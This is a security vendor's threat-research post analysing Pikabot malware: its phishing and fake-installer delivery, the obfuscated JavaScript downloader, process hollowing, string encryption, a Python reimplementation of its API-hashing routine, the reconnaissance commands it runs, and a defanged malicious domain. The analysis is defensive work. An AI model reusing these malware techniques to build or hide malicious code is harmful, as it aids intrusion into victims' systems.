Threat Research

The Rising Threat of Pikabot

Securonix

Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

Since October 2023, our Threat Response Unit (TRU) has observed multiple instances of the Pikabot malware affecting customers within the manufacturing and business services industries.

The initial infection stems from an email containing a link to download a ZIP archive, which in turn, contains an obfuscated JavaScript file responsible for infecting the device when executed by the user.

Upon cleaning up the JS file, we can see it creates directories “EpfijglsorgIjfkmvofguv” under %SYSTEMDRIVE% (2), then attempts to retrieve the malicious .DAT file from URLs (1,2,5) via curl. Upon successful retrieval of the malicious file, it gets renamed to Wiflgodjvo.dll. The malicious DLL file then runs with rundll32.exe and an export name “Enter” (4) in Figure 1.

Figure 1: Cleaned-up JavaScript file

PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). The core payload of PikaBot contains the inline RC4 encryption for the strings. Upon decrypting the strings, we get base64-encoded strings, as shown in Figure 2.

The inline RC4 encryption in Pikabot is used to obfuscate its strings, making it more difficult for security researchers and automated detection systems to analyze and identify the malware’s purpose and behavior.

Figure 2: Decrypted string view in x64dbg

The RC4-decrypted base64-encoded strings then go through another decryption layer with AES, as shown in Figure 3. The key and IV are encrypted with RC4.

Figure 3: AES decryption

For further analysis on Pikabot, please refer to research published by OALabs here
and here.

PikaBot uses API hashing (Figure 4) for only a few API calls; the rest are encrypted using the abovementioned method. The C2 is also encrypted with the same algorithm but uses a different set of an AES key and IV.

Here is the Python implementation of the hashing algorithm used:

def api_hashing(data, length):
    v2 = 8387
    if data and length:
        for i in range(length):
            v4 = data[i] & 0xFF  
            v5 = v4 + 32
            if not 65 <= v4 <= 90:  
                v5 = v4
            v2 = v5 + 5 * v2
    return v2 & 0xFFFFFFFF  
def calculate_and_print_hash(data_string):
    data_bytes = data_string.encode()
    hash_result = api_hashing(data_bytes, len(data_bytes))
    value = hex(hash_result)
    print(f"Hash result '{data_string}': {value}")
calculate_and_print_hash("LoadLibraryA")
calculate_and_print_hash("HeapFree")
calculate_and_print_hash("GetProcAddress")
Figure 4: Hashing algorithm

Upon successful infection, PikaBot gathers basic host information and sends it over to C2. The commands run on the host includes:

  • netstat.exe -aon
  • ipconfig.exe /all
  • whoami.exe /all

Example of some of the information gathered by PikaBot with placeholders:

{"29sogk11": "%s", "8MYMnroOE": "%s", "D2eHqm": "Win %d.%d %d", "Svr0U": %s, "YvqsXd96s": "%s", "Gk03HL": "%s", "KEIsAH": "%s", "6oX3zxl": %d, "J2pBsnnT": "%s", "vxcY4IafK": %d, "CoV203qs": "%s", "OLZpE2": "%s", "9NMqowk9": "%s", "TnyWDGp46": "%s", "yrjOT": "%s", "jcjIbRIYD": %d, "XPQG7Z5l": %d}

For example, D2eHqm holds the Windows version, YvqsXd96s holds the username, Gk03HL holds the system name, KEIsAH
holds the processor information, J2pBsnnT holds display adapter information, vxcY4IafK holds the RAM size, CoV203qs holds the screen size, OLZpE2 holds the Pikabot ID (in our case it’s “1.1.19-gen”), 6oX3zxl likely holds the value of the TickCount.

The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code (Figure 5).

Figure 5: Language check

Pikabot creates the hardcoded mutex value “{C1E8A9B1-57F0-47B0-AB93-C739C6592C5F}” upon successful infection to avoid reinfecting the host.

Additional Insights

In one particular customer environment, we observed an unsuccessful attempt of a Pikabot infection via drive-by download. In this instance, the client searched for AnyDesk installer and stumbled across the malicious page anadesky.firstbasedso[.]com (Figure 6), from which they downloaded a malicious MSI installer that was signed by “The New Print Shop LTD”.

Jérôme Segura, the Senior Director of Threat Intelligence at Malwarebytes, also published an article on December 15, 2023, detailing how Pikabot leverages malicious ads for its distribution.

Figure 6: Malicious fake AnyDesk page serving PikaBot payload

Pivoting with VirusTotal, we found another two domains impersonating Slack and Zoom, as shown in Figures 7-9.

Figure 7: Malicious domains impersonating Slack and Zoom
Figure 8: Malicious page impersonating Zoom
Figure 9: Malicious page impersonating Slack

What did we do?

Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat, and notified the customer of suspicious activities.

What can you learn from this TRU Positive?

  • The use of phishing emails containing links to download malicious ZIP archives highlights the continued reliance on social engineering by attackers. It underscores the importance of educating users about the dangers of unsolicited emails and the need for caution when downloading attachments.
  • The payload’s functionality to check the system’s language setting and halt further execution if it detects Russian or Ukrainian suggests a targeted approach to infections. This tactic could be indicative of the origin or specific objectives of the attackers.
  • The creation of a hardcoded mutex by Pikabot to avoid reinfection illustrates a common malware technique to maintain a single instance in the system. Understanding such techniques can aid in developing more effective malware detection and removal strategies.
  • The observed instances where attackers impersonated legitimate software like AnyDesk, Slack, and Zoom for malware distribution via malicious ads and websites highlight the risk of trust exploitation. This calls for vigilance when downloading software and accessing web resources, even those that appear legitimate.

Recommendations from our Threat Response Unit (TRU):

  • Protect endpoints against malware by:
  • Identify file types that are commonly associated with security risks, such as executable files (.exe, .bat, .cmd), script files (.js, .vbs, .ps1), and certain document types that support macros (.docm, .xlsm). Then select a file type that is inherently safer and does not support executable code or active content (i.e., a plain text format like .txt).
  • Raise awareness of malware masquerading as legitimate applications, and include in your Phishing and Security Awareness Training (PSAT) program.
    • An effective PSAT program emphasizes building cyber resilience by increasing risk awareness, rather than trying to turn everyone into security experts.

Detection Rules and Indicators of Compromise

  • You can access Yara rule for PikaBot here.
  • You can access the IOCs related to PikaBot here.

References

Source: https://www.esentire.com/blog/the-rising-threat-of-pikabot

Tags: HUNT, SOC, PAYLOAD, EMAIL, MDR, BREACH, WINDOWS, LEARN